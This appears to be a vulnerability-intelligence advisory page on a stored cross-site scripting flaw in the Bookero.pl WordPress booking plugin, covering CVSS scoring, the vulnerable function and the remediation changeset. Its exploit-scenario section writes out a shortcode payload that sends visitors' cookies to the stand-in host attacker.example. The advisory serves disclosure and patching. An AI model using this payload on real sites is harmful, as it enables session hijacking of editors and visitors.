Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
PR:L reflects mandatory contributor access; UI:R corrects the provided vector since a victim must visit the page for stored XSS to execute.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Bookero.pl - system rezerwacji online plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bookero_products shortcode's hide_products (and filter_products) attributes in versions up to and including 2.2. This is due to insufficient input sanitization and output escaping in the bookero_products() function - the raw attribute value is concatenated directly into an inline <script> block without any escaping. This makes it possible for authenticated attackers with contributor-level access and above to inject arbitrary web scripts into pages that will execute whenever a user accesses the injected page.
AnalysisAI
Stored Cross-Site Scripting in the Bookero.pl WordPress booking plugin (versions up to and including 2.2) allows authenticated contributors to permanently inject arbitrary JavaScript into WordPress pages via the bookero_products shortcode. The bookero_products() function in libraries/bookero-front.php (lines 173-174) concatenates the raw hide_products and filter_products attribute values directly into an inline <script> block with no sanitization or output escaping, meaning any page rendered with the poisoned shortcode will execute the attacker-supplied script in every visitor's browser. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to hold a WordPress user account with at minimum contributor-level privileges, which grants the ability to create posts and use shortcodes. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 6.4 (Medium) reflects a network-reachable (AV:N), low-complexity (AC:L) attack requiring low privileges (PR:L) with a scope change (S:C) and limited confidentiality and integrity impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has registered as a contributor on a WordPress site inserts a shortcode such as `[bookero_products hide_products="1; document.location='https://attacker.example/steal?c='+document.cookie; var x="]` into a post or page draft and submits it for publication. When an editor or administrator reviews the draft - or once published, when any site visitor loads the page - the malicious JavaScript executes in their browser, potentially exfiltrating session cookies or authentication tokens to the attacker's server. … |
| Remediation | A fix has been committed to the WordPress plugin SVN repository as changeset 3524452 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3524452%40bookeropl&new=3524452%40bookeropl); however, an exact released patched version number is not independently confirmed from the available data - administrators should update to the latest available version in the WordPress Plugin Directory and verify the installed version is newer than 2.2. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42528
GHSA-vvcw-jcq9-759q